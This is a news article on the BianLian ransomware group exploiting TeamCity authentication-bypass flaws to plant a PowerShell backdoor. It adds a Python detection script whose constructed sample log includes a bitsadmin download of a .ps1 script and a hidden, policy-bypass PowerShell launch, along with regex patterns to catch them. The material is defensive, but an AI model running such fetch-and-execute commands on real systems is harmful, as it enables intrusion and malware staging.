
BianLian Hackers Up Their Game: New Ransomware Tactics Target TeamCity Servers

March 11, 2024 – Published on The Review Hive

The BianLian ransomware group, known for its focus on extortion, has been observed exploiting vulnerabilities in JetBrains TeamCity software to deploy malicious PowerShell backdoors. This finding highlights BianLian’s ability to adapt and adopt new techniques to infiltrate target networks.

GuidePoint Security researchers discovered a recent BianLian attack that began with the exploitation of one of two known TeamCity authentication-bypass vulnerabilities, CVE-2024-27198 or CVE-2023-42793, on an internet-facing TeamCity server. This initial breach allowed the attackers to create new user accounts on the server and execute commands on the host.

Following this initial foothold, the attackers relied on legitimate, living-off-the-land tooling: winpty to run commands and BITSAdmin to download a malicious PowerShell script (web.ps1), together with the communication tools used to reach their command-and-control (C2) server.
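The chain described above (commands spawned from the TeamCity process, BITSAdmin staging a .ps1 file, PowerShell launched with policy bypass) is the kind of thing a process-creation log can surface. The following is an added detection sketch written for this page; it is not GuidePoint's tooling or anything recovered from the intrusion. The one-event-per-line `ParentImage|Image|CommandLine` format, the sample events, the `example.invalid` URL and the `TeamCityService.exe` parent-process name are all constructed or assumed for the example (the real parent will be whatever process runs the TeamCity server on a given host, typically a java.exe under the install directory or the service wrapper).

```python
"""Detection sketch for the BianLian TeamCity post-exploitation chain.

Flags three behaviours from the write-up:
  1. a process spawned by the TeamCity server process (post-exploitation commands),
  2. bitsadmin.exe used to transfer a file with a .ps1 extension (web.ps1 staging),
  3. powershell.exe launched with an execution-policy bypass, hidden window
     or encoded command.

The log format (ParentImage|Image|CommandLine, one event per line), the
sample events and the TeamCityService.exe parent name are constructed for
this example; none of it is real telemetry or an IOC from the incident.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    parent_image: str
    image: str
    command_line: str


# Process-creation events constructed for this example (not real telemetry).
SAMPLE_LOG = """\
C:\\TeamCity\\bin\\TeamCityService.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami
C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer job /download /priority high http://example.invalid/web.ps1 C:\\Users\\Public\\web.ps1
C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\\Users\\Public\\web.ps1
C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt
C:\\Windows\\System32\\svchost.exe|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer update /download http://example.invalid/patch.msi C:\\Temp\\patch.msi
"""

# bitsadmin ... /transfer ... <something>.ps1  (BITS used to stage a PowerShell script)
BITS_PS1 = re.compile(r"\bbitsadmin(?:\.exe)?\b.*\s/transfer\b.*\.ps1\b", re.I)
# Common PowerShell evasion switches: policy bypass, hidden window, encoded payload.
PS_SUSPICIOUS = re.compile(
    r"-(?:ExecutionPolicy\s+Bypass|ep\s+bypass|WindowStyle\s+Hidden|w\s+hidden|EncodedCommand|enc)\b",
    re.I,
)


def parse_log(text: str) -> list[Event]:
    """Parse the constructed pipe-delimited format into Event records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parent, image, cmd = line.split("|", 2)
        events.append(Event(parent, image, cmd))
    return events


def classify(event: Event) -> list[str]:
    """Return the list of detection names that fire for one event."""
    findings = []
    # Assumption: the TeamCity server's image path contains "teamcity".
    if "teamcity" in event.parent_image.lower():
        findings.append("teamcity-child-process")
    if event.image.lower().endswith("bitsadmin.exe") and BITS_PS1.search(event.command_line):
        findings.append("bitsadmin-ps1-download")
    if event.image.lower().endswith("powershell.exe") and PS_SUSPICIOUS.search(event.command_line):
        findings.append("powershell-bypass")
    return findings


def detect(text: str) -> list[tuple[int, list[str]]]:
    """Run the classifier over a log and return (1-based line number, findings) for hits."""
    hits = []
    for idx, ev in enumerate(parse_log(text), start=1):
        findings = classify(ev)
        if findings:
            hits.append((idx, findings))
    return hits


if __name__ == "__main__":
    for line_no, names in detect(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(names)}")
```

Each rule on its own is noisy (administrators do use BITSAdmin and run scripts with `-ExecutionPolicy Bypass`); the value in this chain is correlation: a TeamCity-spawned shell followed within minutes by a BITS transfer of a .ps1 and a hidden-window PowerShell launch on the same host is a sequence that should page someone, whereas a lone `bitsadmin /transfer` of an .msi from a patching service (the last sample line) correctly stays quiet.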

While BianLian has traditionally relied on custom Go-based backdoors, this intrusion used a PowerShell backdoor instead. Although obfuscated, the script was deconstructed by GuidePoint researchers, and their analysis found functionality closely matching the Go backdoor: outbound network connections to the C2 server, remote command execution, and asynchronous execution to keep the implant's activity less conspicuous.
